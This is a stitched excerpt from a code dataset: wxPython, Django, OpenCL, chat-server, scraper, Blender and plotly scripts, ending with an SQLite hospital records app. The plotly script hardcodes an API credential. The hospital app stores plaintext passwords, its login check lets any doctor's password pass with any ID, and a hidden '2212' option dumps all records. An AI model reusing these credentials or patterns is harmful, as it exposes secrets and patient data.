PlatformMethods.ConvertFilePath(\"Images/Bitmaps/plus4.ico\")\r\n bitmap_minus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/minus4.ico\")\r\n \r\n bitmap = wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO)\r\n width = bitmap.GetWidth()\r\n \r\n il = wx.ImageList(width, width)\r\n \r\n il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n\r\n self.buttonsIL = il \r\n #self.treeDirList.SetButtonsImageList(il)\r\n self.treeDirList.AssignButtonsImageList(il)\r\n \r\n def GetParentItem(self, parentName):\r\n parentItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while parentItem:\r\n if self.GetItemText(parentItem) == parentName:\r\n return parentItem\r\n parentItem = self.treeDirList.GetNextSibling(parentItem)\r\n return parentItem\r\n \r\n \r\n def AddDirectoryTreeNode(self, dirPath):\r\n dirList = dirPath.split(PlatformMethods.GetDirSeparator())\r\n #print dirList\r\n parentItem = self.root\r\n childrenDirList = dirList[1:]\r\n for dirName in dirList:\r\n if not dirName:\r\n continue\r\n #always start from directories in the drive e.g. 
C:\\NMT\\Research\\AJAX\r\n #dirName = dirList[i]\r\n siblingItem = self.GetSiblingItem(parentItem, dirName)\r\n #no directory with that name found in this level, so add it\r\n if not siblingItem:\r\n if parentItem == self.root:\r\n #add drive and image\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n else:\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n self.AddSubDirectories(siblingItem, childrenDirList)\r\n break\r\n else:\r\n childrenDirList = childrenDirList[1:]\r\n parentItem = siblingItem\r\n \r\n self.treeDirList.SortChildren(parentItem)\r\n \r\n \r\n #dir List without drive\r\n def AddSubDirectories(self, parentItem, childrenDirList):\r\n for dirName in childrenDirList:\r\n #Insert new node as parent Item\r\n parentItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(parentItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(parentItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n \r\n \r\n def GetSiblingItem(self, parentItem, dirName):\r\n siblingItem = self.treeDirList.GetFirstChild(parentItem)[0]\r\n while siblingItem:\r\n if self.GetTreeItemText(siblingItem) == dirName:\r\n break\r\n siblingItem = self.treeDirList.GetNextSibling(siblingItem)\r\n return siblingItem\r\n\r\n\r\n def GetDriveItem(self, driveName):\r\n rootDirItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while rootDirItem:\r\n if self.GetItemText(rootDirItem) == driveName:\r\n break\r\n parentItem = self.treeDirList.GetNextSibling(rootDirItem)\r\n return rootDirItem\r\n \r\n \r\n def AddDirectoryTreeNodes(self):\r\n self.treeDirList.DeleteAllItems()\r\n #tbd: add image for the root\r\n self.root = self.treeDirList.AddRoot(\"Folders (\" + str(Globals.CurrentProject.TotalDirectories) + \")\")\r\n fullDirPath = Globals.DirectoryList[0]\r\n fullPathList = fullDirPath.split(PlatformMethods.GetDirSeparator())\r\n \r\n for dirPath in Globals.DirectoryList:\r\n self.AddDirectoryTreeNode(dirPath)\r\n \r\n self.treeDirList.SortChildren(self.root)\r\n self.treeDirList.Expand(self.root)\r\n return self.root\r\n \r\n \r\n def GetTreeItemText(self, item):\r\n if item:\r\n return self.treeDirList.GetItemText(item)\r\n else:\r\n return \"\"","sub_path":"DirectoryViewStyle.py","file_name":"DirectoryViewStyle.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"116681642","text":"#coding=utf-8\nfrom oscar.apps.catalogue.admin import * # noqa\nfrom .models import SearchFilter,ProductAttribute,ProductGroup\n\nadmin.site.unregister(ProductAttribute,)\n\nclass SearchFilterUserMoneyChangeAdmin(admin.ModelAdmin):\n list_display = ('class_id','attribute', 'search_value', 'search_order', 'chose')\n \n \n def class_id(self,obj):\n return obj.attribute.product_class.name\n class_id.short_description= u'商品类'\n \n #过滤搜索属性\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n if db_field.name == 'attribute':\n kwargs['queryset'] = ProductAttribute.objects.filter(search_filter=True)\n\n return super(SearchFilterUserMoneyChangeAdmin,self).formfield_for_foreignkey(db_field, request=request, **kwargs)\n\nclass SearchFilterInline(admin.TabularInline):\n model = SearchFilter\n \nclass ProductAttributeAdmin(ProductAttributeAdmin):\n list_display = ('name', 'code', 'product_class', 'type')\n prepopulated_fields = {\"code\": (\"name\", )}\n inlines=[SearchFilterInline,]\n \nclass ProductGroupAdmin(admin.ModelAdmin):\n list_display = ('name',)\n filter_horizontal = ('attr',)\n \n\nadmin.site.register(SearchFilter,SearchFilterUserMoneyChangeAdmin)\nadmin.site.register(ProductAttribute, ProductAttributeAdmin)\nadmin.site.register(ProductGroup, ProductGroupAdmin)\n","sub_path":"stars/apps/catalogue/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"331016124","text":"\"\"\"Utilities for using the OpenCL kernels.\"\"\"\nimport numpy as np\nimport pyopencl as cl\n\n\nDOUBLE_FP_SUPPORT = (\n cl.device_fp_config.DENORM | cl.device_fp_config.FMA |\n cl.device_fp_config.INF_NAN | cl.device_fp_config.ROUND_TO_INF |\n cl.device_fp_config.ROUND_TO_NEAREST |\n cl.device_fp_config.ROUND_TO_ZERO\n )\n\n\ndef double_fp_support(device):\n \"\"\"\n Test whether a context supports double floating-point precission.\n\n :arg device: The OpenCL context to test.\n :type device: :class:`pyopencl._cl.Device`\n\n :returns: `True` if the device supports double floating-point precision,\n `False` otherwise.\n :rtype: `bool`\n \"\"\"\n return device.get_info(cl.device_info.DOUBLE_FP_CONFIG) & DOUBLE_FP_SUPPORT\n\n\ndef get_context():\n \"\"\"\n Find an appropriate OpenCL context.\n\n This function looks for a device with support for double\n floating-point precision and prefers GPU devices.\n\n :returns: A context with a single suitable device, or `None` is no suitable\n device is found.\n :rtype: :class:`pyopencl._cl.Context` or `NoneType`\n \"\"\"\n for platform in cl.get_platforms():\n for device_type in [cl.device_type.GPU, cl.device_type.ALL]:\n for device in platform.get_devices(device_type):\n if double_fp_support(device):\n return cl.Context([device])\n return None\n\n\ndef pad(array, group_size, axis=0):\n \"\"\"\n Pad an array with zeros so that it is a multiple of the group size.\n\n :arg array: Array to pad.\n :type array: :class:`numpy.ndarray`\n :arg int group_size: OpenCL group size.\n :arg int axis: The axis to pad with zeros. Default is 0.\n\n :returns: `array` padded with an appropriate number of zeros.\n :rtype: :class:`numpy.ndarray`\n \"\"\"\n array_size = array.shape[axis]\n remainder = array_size % group_size\n if remainder == 0:\n return array\n else:\n padding = group_size - array_size % group_size\n padding_shape = list(array.shape)\n padding_shape[axis] = padding\n return np.concatenate(\n (array, np.zeros(padding_shape, dtype=array.dtype)), axis=axis\n )\n","sub_path":"peridynamics/cl/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"506784711","text":"# server.py\n \nimport sys\nimport socket\nimport select\nimport re\nfrom utils import *\n\nclass Server:\n \n socket_list = []\n channels = []\n client_channel_map = {}\n host = \"localhost\"\n \n def __init__(self, port):\n self.host = socket.gethostbyname(self.host)\n self.port = int(port)\n \n # initialize the server socket with given host and port\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((self.host, self.port))\n \n # make it listen to 5 connections\n self.server_socket.listen(5)\n \n # add server socket to the list of readable connections\n self.socket_list.append(self.server_socket)\n \n def start_chat(self):\n while True:\n # get the list of sockets ready to be read through select.select\n ready_to_read, ready_to_write, in_error = select.select(self.socket_list, [], [])\n \n for socket in ready_to_read:\n if socket == self.server_socket:\n self.connection_request()\n \n # message is from an existing client connection\n else:\n try:\n message = socket.recv(MESSAGE_LENGTH)\n client_address = str(socket.getpeername())\n client_name = message.split(\" \", 1)[0].replace(\"[\", \"\").replace(\"]\", \"\")\n\n if message:\n # message is a control message\n if re.match(r'/', message.split(\" \", 1)[1].rstrip()):\n self.control_message(message, client_name, client_address, socket)\n \n # if not an ordinary message\n else:\n if self.client_channel_map.get(client_address):\n if \"Disconnect!\" in message.rstrip():\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(client_name) + \"\\n \")\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n else:\n self.broadcast(socket, message + \" \")\n else:\n self.send_to_client(socket, SERVER_CLIENT_NOT_IN_CHANNEL + \"\\n \")\n except:\n continue\n \n \n # if a new connection request is received\n # socket == self.server_socket works because client socket is binded or has \n # the same host and ip such as this client\n def connection_request(self):\n (new_client_socket, (address)) = self.server_socket.accept()\n self.socket_list.append(new_client_socket)\n self.send_to_client(new_client_socket, \"Welcome to the chat app! 
Your address is \" + str(address) + \".\\n \")\n \n # handles control messages \n def control_message(self, message, name, address, socket):\n # send channel list to client\n if re.match(r'/list$', message.split(\" \", 1)[1].rstrip()):\n for channel in self.channels:\n self.send_to_client(socket, channel + \"\\n \")\n # client wants to create a new channel\n # elif \"/create\" in message:\n elif re.match(r'^(/create)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/create\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/create \")[1].rstrip()\n if channel in self.channels:\n self.send_to_client(socket, SERVER_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \"\\n \")\n \n self.channels.append(channel)\n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You created a new channel named \" + channel + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_CREATE_REQUIRES_ARGUMENT + \".\\n \")\n # join an existing channel \n # elif \"/join\" in message:\n elif re.match(r'^(/join)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/join\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/join \")[1].rstrip()\n if channel in self.channels:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \".\\n \")\n \n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You joined a channel named \" + channel + \".\\n \")\n self.broadcast(socket, SERVER_CLIENT_JOINED_CHANNEL.format(name) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_NO_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_JOIN_REQUIRES_ARGUMENT + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_INVALID_CONTROL_MESSAGE.format(message.split(\" \", 1)[1].rstrip()) + \"\\n \")\n \n # send message to all clients \n def broadcast(self, client_socket, message):\n for socket in self.socket_list:\n # send messages only to peers\n if socket != self.server_socket and socket != client_socket:\n if self.client_channel_map[str(client_socket.getpeername())] == self.client_channel_map[str(socket.getpeername())]:\n try:\n socket.send(message)\n except:\n socket.close()\n if socket in self.socket_list:\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n \n # send to a specific client\n def send_to_client(self, client_socket, message):\n try:\n client_socket.send(message)\n except:\n client_socket.close()\n if client_socket in self.socket_list:\n self.socket_list.remove(client_socket)\n self.client_channel_map.pop(client_socket)\n\nif len(sys.argv) < 3:\n server = Server(sys.argv[1])\n server.start_chat()","sub_path":"Machine Problem #1 Chat (Kuizon, Vicente)/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"499966737","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass MinecraftWikiCrawler:\n\n def __init__(self):\n self.Prefix = 'https://minecraft-zh.gamepedia.com/'\n\n def Search(self, Tag):\n format_string = ''\n url = self.Prefix + Tag\n res = requests.get(url)\n content = res.content\n soup = BeautifulSoup(content, 'html.parser')\n Total = ''\n for index, data in enumerate(soup.select('#pageWrapper #bodyContent div.mw-parser-output p')):\n format_string += str(data.text)\n if data.has_attr('href'):\n format_string += str(data['href'])\n Total += format_string\n return Total\n","sub_path":"Models/MinecraftWikiCrawler.py","file_name":"MinecraftWikiCrawler.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"9057445","text":"#Name: Chris Demundo\n#Umich ID: cdemundo\n\n# Imports -- you may add others but do not need to\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport csv\n\n#login to plot.ly required to save offline image files\npy.sign_in('cdemundo', 'UEVvPcPrIgVPn6YTRLBF')\n\n# Code here should involve creation of the bar chart as specified in instructions\n# And opening / using the CSV file you created earlier with noun data from tweets\ncsv_file_path = \"./noun_data.csv\"\n\nwith open(csv_file_path) as f:\n reader = csv.DictReader(f)\n data = [r for r in reader]\n\ndata = [go.Bar(\n x=[d[\"Noun\"] for d in data],\n y=[d[\"Number\"] for d in data]\n )]\n\nlayout = go.Layout(\n title='Analysis of Tweets',\n xaxis=dict(\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n yaxis=dict(\n title='Number of Times Used',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n )\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npy.image.save_as(fig, filename='part4_viz_image.png')","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"241890502","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n#bl_info = {\n# \"name\": \"Balance Vertex Groups\",\n# \"author\": \"Koilz\",\n# \"version\": (1, 1),\n# \"blender\": (2, 70, 0),\n# \"location\": \"Properties > Data > Vertex Groups > Edit Mode\",\n# \"description\": \"Balance the weight of two vertex groups\",\n# \"warning\": \"\",\n# \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Rigging/VG_Oppose\",\n# \"category\": \"Rigging\"}\n\nimport bpy\n\nbpy.types.Scene.vgai2 = bpy.props.StringProperty(name=\"Vertex Group Index 2\", description=\"Second active index for vertex groups\", default='')\n\ndef main(context):\n\n # save vertex_group\n vg_previous = context.active_object.vertex_groups.active_index\n\n # save weight\n vg_weight_previous = context.scene.tool_settings.vertex_group_weight\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # oppose vertex group\n context.active_object.vertex_groups.active_index = context.active_object.vertex_groups[context.scene.vgai2].index\n\n # oppose weight\n context.scene.tool_settings.vertex_group_weight = 1-vg_weight_previous\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # restore vertex group\n context.active_object.vertex_groups.active_index = vg_previous\n\n # restore weight\n context.scene.tool_settings.vertex_group_weight = vg_weight_previous\n\nclass OT_BALANCE_VG(bpy.types.Operator):\n \"\"\"Balance the weight of two vertex groups\"\"\"\n bl_idname = \"object.vertex_group_balance\"\n bl_label = \"Balance\"\n\n @classmethod\n def poll(cls, context):\n return context.active_object is not None\n\n def execute(self, context):\n main(context)\n return {'FINISHED'}\n\ndef add_vertex_group_tools(self, context):\n\n layout = self.layout\n\n ob = context.object\n\n if ob.vertex_groups and ob.mode == 'EDIT':\n\n row = layout.row()\n row.operator(\"object.vertex_group_balance\")\n row.prop_search(context.scene, \"vgai2\", context.active_object, \"vertex_groups\", text=\"\")\n\ndef register():\n bpy.utils.register_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.append(add_vertex_group_tools)\n\ndef unregister():\n bpy.utils.unregister_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.remove(add_vertex_group_tools)\n\nif __name__ == \"__main__\":\n register()\n\n","sub_path":"scripts/addons_extern/metatool_addon/vert_balance_vertex_groups.py","file_name":"vert_balance_vertex_groups.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"279260672","text":"import os\nimport logging\n\nos.chdir(r'G:\\cnx\\projects\\udacity\\Self-Driving Cars\\1 - Computer Vision, Deep Learning and Sensor\\Project 3 - Traffic Sign Classifier\\local')\n\nimport Display\n\nFORMAT = '%(module)-15s:%(levelname)-5s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.DEBUG)\nlogging.getLogger(\"display\").setLevel(logging.DEBUG)\n\nlogging.info(\"Main file\")\nlogging.debug(\"Test\")\n\ninput = r'G:/cnx/projects/udacity/Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 2 - Advanced Lane Finding/test_images'\noutput = r'G:/test/'\na = Display.Image(input, output)\na.run()\n","sub_path":"Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 3 - Traffic Sign Classifier/local/display_test.py","file_name":"display_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"498384341","text":"import getpass\r\nimport sqlite3\r\nconnection=sqlite3.connect('hospital.db')\r\ncursor=connection.cursor()\r\nerror=1\r\nfrom os import system, name\r\ndef screen_clear():\r\n if name == 'nt':\r\n _ = system('cls')\r\n else:\r\n _ = system('clear')\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='doctor'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE doctor ( \r\n d_id number primary key, \r\n dnamedfirst VARCHAR2(20), \r\n dnamedlast VARCHAR2(30), \r\n password varchar2(20) not null,\r\n speciality varchar2(40) not null,\r\n shift varchar2(10) not null,\r\n phone number(10) not null);\"\"\")\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='patient'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE patient ( \r\n p_id number primary key, \r\n pfirst VARCHAR2(20), \r\n pdlast VARCHAR2(30), \r\n City varchar2(20) not null,\r\n DOB date not null,\r\n age number not null,\r\n DOA date not null,\r\n number number(10) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE virus ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n vname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE bacteria ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n bname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE injury ( \r\n p_id number not null, \r\n iname VARCHAR2(20) primary key,\r\n idiagnosis VARCHAR2(50), \r\n type varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(101,'Mohit','Nayak','Bangalore','15-March-2001',18,'08-March-2020',9078435952)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(102,'Anikiat','Saraf','Kolkata','22-Dec-2000','19','15-Feb-2020',9674825476)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(103,'Rishank','Pratik','Orissa','22-Dec-2001','18','19-Nov-2015',9117854569)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(104,'Risav','Jana','Nepal','06-Jan-2001',18,'25-Oct-2010',7854963284)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(105,'Wilson','Vidyut','Mumbai','23-Nov-2001',18,'23-Nov-2005',7854129645)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(106,'Dinesh','Sharma','Rajasthan','23-Feb-2000',20,'23-Feb-2000',8476423858)\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(103,'Ebola','Ebov','Oxygen Therapy, IV Fluids','Muscle Pain, Fever, Bleeding')\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(105,'Measles','Paramyxo','Vitamin A','Cough, Skin Rash')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(101,'TB','Mycobacterium','Antibiotics','Cough and Sneezes')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(106,'Cholera','Vibrio','IV Fluids, Antibiotics','Seizures, Diarrhoea')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(102,'Hair line Fracture','Plaster, Pain Killer','Toe Fracture')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(104,'bullet wound','Removal of Bullet','Wound')\"\"\")\r\n print(\"Databse created successfully\")\r\n \r\nelse:\r\n e=1\r\n while e!=0:\r\n e=int(input(\"1. Sign In\\n2. 
Create a New Doctor Account\\n\"))\r\n if e==2:\r\n did=int(input('\\nEnter id - '))\r\n dnf=input('Enter first name - ')\r\n dnl=input('Enter last name - ')\r\n pas=getpass.getpass('Enter password - ')\r\n spec=input('Enter speciality - ')\r\n shf=input('Enter working shift - ')\r\n ph=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into doctor values(?,?,?,?,?,?,?)\"\"\",(did,dnf,dnl,pas,spec,shf,ph))\r\n screen_clear()\r\n e=1\r\n elif e==1:\r\n while error==1:\r\n i=input(\"\\nEnter your ID - \")\r\n p=getpass.getpass(\"Enter your Password - \")\r\n cursor.execute(\"\"\"select count(d_id) from doctor where d_id=(?)\"\"\",(i,))\r\n if cursor.fetchone()[0]==1:\r\n cursor.execute(\"\"\"select count(password) from doctor where password=?\"\"\",(p,))\r\n if cursor.fetchone()[0]==1:\r\n print(\"\\nSign in successful!\")\r\n screen_clear()\r\n error=0\r\n e=0\r\n r=1\r\n cursor.execute(\"\"\"select d_id,dnamedfirst,dnamedlast,speciality,shift,phone from doctor where d_id=(?)\"\"\",(i,))\r\n for row in cursor.fetchall():\r\n print(\"ID -\",row[0],\" Name -\",row[1], row[2],\" Speciality -\",row[3],\"\\nShift -\",row[4],\" Phone Number -\",row[5])\r\n while r!=0:\r\n print(\"\\n1. View Patient details\\n2. Add a New Patient\\n3. Delete Patient Details\\n0. Exit\")\r\n r=int(input())\r\n if r==1:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from patient where p_id=(?)\"\"\",(access,))\r\n print(\"\\nPatient Details - \")\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"First Name: \", row[1])\r\n print(\"Last Name: \", row[2])\r\n print(\"City: \", row[3])\r\n print(\"Date of Birth: \", row[4])\r\n print(\"Age: \", row[5])\r\n print(\"Date of Admission: \", row[6])\r\n print(\"\\nDiagnosis Report - \")\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from virus where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Virus Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from bacteria where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Bacteria Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from injury where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Injury Name: \", row[1])\r\n print(\"Diagnosis Name: \", row[2])\r\n print(\"Type: \", row[3])\r\n print(\"\\n\")\r\n else:\r\n print(\"Incorrect Patient id\")\r\n elif r==2:\r\n pid=int(input('\\nEnter id - '))\r\n pnf=input('Enter first name - ')\r\n pnl=input('Enter last name - ')\r\n pcity=input('Enter city - ')\r\n pdob=input('Enter date of birth - ')\r\n page=int(input('Enter age - '))\r\n pdoa=input('Enter date of admission - ')\r\n pnum=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert 
into patient values(?,?,?,?,?,?,?,?)\"\"\",(pid,pnf,pnl,pcity,pdob,page,pdoa,pnum))\r\n print(\"\\n1. Virus\\n2. Bacteria\\n3. Injury\")\r\n m=int(input())\r\n if m==1:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter virus name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into virus values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==2:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter bacteria name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into bacteria values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==3:\r\n iname=input(\"\\nEnter injury name - \")\r\n idiag=input(\"Enter diagnosis - \")\r\n itype=input(\"Enter injury type - \")\r\n cursor.execute(\"\"\"insert into injury values(?,?,?,?)\"\"\",(pid,iname,idiag,itype))\r\n print(\"\\nPatient Added\")\r\n connection.commit()\r\n elif r==3:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from patient where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from virus where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from bacteria where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from injury where p_id=(?)\"\"\",(access,))\r\n else:\r\n print(\"Incorrect Patient id Patient does not exist\")\r\n print(\"\\nPatient Deleted\")\r\n connection.commit()\r\n elif r==0:\r\n break\r\n else:\r\n print(\"Incorrect passoword. Please retry \")\r\n else:\r\n print(\"Incorrect User ID. Please retry \")\r\n break\r\n elif e==2212:\r\n cursor.execute(\"\"\"select * from doctor\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from virus\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from bacteria\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from injury\"\"\")\r\n print(cursor.fetchall())\r\n break\r\nconnection.commit()\r\nconnection.close()\r\nprint(\"\")\r\ndef progress(status, remaining, total):\r\n print(f'Copied {total-remaining} of {total} pages...')\r\n\r\ntry:\r\n sqliteCon = sqlite3.connect('hospital.db')\r\n backupCon = sqlite3.connect('hospital_backup.db')\r\n with backupCon:\r\n sqliteCon.backup(backupCon, pages=1, progress=progress)\r\n print(\"backup successful\")\r\nexcept sqlite3.Error as error:\r\n print(\"Error while taking backup: \", error)\r\nfinally:\r\n if(backupCon):\r\n backupCon.close()\r\n sqliteCon.close()\r\n","sub_path":"Doctor.py","file_name":"Doctor.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
